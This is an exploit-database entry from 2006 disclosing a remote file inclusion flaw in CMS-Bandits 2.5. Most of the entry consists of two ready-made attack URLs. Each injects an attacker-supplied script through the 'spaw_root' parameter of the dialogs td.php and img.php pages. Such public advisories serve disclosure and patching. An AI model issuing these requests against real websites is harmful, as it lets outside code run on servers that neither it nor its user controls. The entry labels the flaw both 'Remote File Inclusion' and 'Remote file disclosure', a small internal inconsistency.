CMS-Bandits 2.5 - 'spaw_root' Remote File Inclusion

EDB-ID:

1890




Platform:

PHP

Date:

2006-06-08


# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]

# milw0rm.com [2006-06-08]